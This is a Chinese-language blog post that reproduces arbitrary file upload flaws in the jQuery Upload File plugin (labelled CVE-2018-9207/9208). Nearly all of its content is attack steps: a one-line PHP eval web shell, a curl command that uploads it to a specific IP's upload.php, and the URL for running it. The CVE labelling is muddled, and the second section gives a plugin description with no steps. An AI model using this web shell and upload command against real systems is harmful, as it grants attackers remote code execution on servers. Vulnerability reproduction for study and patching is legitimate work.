前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)

【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)

作者头像
reyeye
发布2022-10-31 11:53:58
1K0
发布2022-10-31 11:53:58
举报
文章被收录于专栏:肖萧然最秀肖萧然最秀

1.php

在这里插入图片描述
在这里插入图片描述
代码语言:javascript
复制
<?php eval($_POST[1]);

(CVE-2018-9208)

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。

jQuery Upload File <= 4.0.2 中的任意文件上传

代码语言:javascript
复制
 curl -F "myfile=@1.php" "http://123.58.224.8:41698/jquery-upload-file/php/upload.php"
代码语言:javascript
复制
http://123.58.224.8:41698/jquery-upload-file/php/uploads/1.php

(CVE-2018-9208)

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-10-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.php
  • (CVE-2018-9208)
  • (CVE-2018-9208)
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档